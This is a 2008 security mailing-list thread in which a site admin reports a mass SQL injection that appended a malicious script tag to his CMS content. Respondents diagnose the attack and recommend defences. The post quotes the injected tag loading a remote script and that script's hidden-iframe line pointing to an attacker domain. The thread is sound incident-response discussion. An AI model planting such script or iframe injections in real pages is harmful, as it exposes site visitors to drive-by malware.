Security Incidents mailing list archives
Re: Mysterious JavaScript appearance in website database
From: "Yuli Stremovsky" <stremovsky () gmail com>
Date: Tue, 15 Apr 2008 19:49:10 +0300
I can advise you to update your CMS system including all plugins and install SQL firewall. You can use GreenSQL db firewall to protect MySQL server from SQL injection attacks. http://www.greensql.net/ Best regards, Yuli On Tue, Apr 15, 2008 at 2:53 AM, Jon Oberheide <jon () oberheide org> wrote:
Looks like an SQL injection attack. Take a look in your MS-SQL database at the affected entries and I bet you'll see the nmidahena reference. Since this is a widespread, automated attack that has affected other sites, it's unlikely it was targeted at your specific organization or custom CMS. Give your codebase a thorough audit for SQL injection vectors. Regards, Jon Oberheide On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the titles of much of the content on our website: <script src=http://www.nihaorr1.com/1.js></script> NB: the last modified dates for all of the content containing a reference to this script are identical, right down the 1/100 second. The contents of the script apparently attempts to open an iframe to a non-existent domain, "nmidahena.com": document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>"); I haven't found any reports of a new worm, etc. that might account for this, but when I Google "nmidahena.com" I get over 100,000 hits for other sites on which this script is present. We are running a custom-developed CMS with MS-SQL Server 2000 as the backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes released prior to NT4's end-of-life declaration by MS, for what it's worth.) Anyone have an idea what might have caused this?-- Jon Oberheide <jon () oberheide org> GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
-- http://www.kyplex.com/
Current thread:
- Mysterious JavaScript appearance in website database Glenn Gillis (Apr 14)
- Re: Mysterious JavaScript appearance in website database Jon Oberheide (Apr 14)
- Re: Mysterious JavaScript appearance in website database Yuli Stremovsky (Apr 15)
- Re: Mysterious JavaScript appearance in website database Bojan Zdrnja (Apr 15)
- Re: Mysterious JavaScript appearance in website database Glenn Gillis (Apr 15)
- Re: Mysterious JavaScript appearance in website database Bob Cunningham (Apr 15)
- Re: Mysterious JavaScript appearance in website database Jon Oberheide (Apr 14)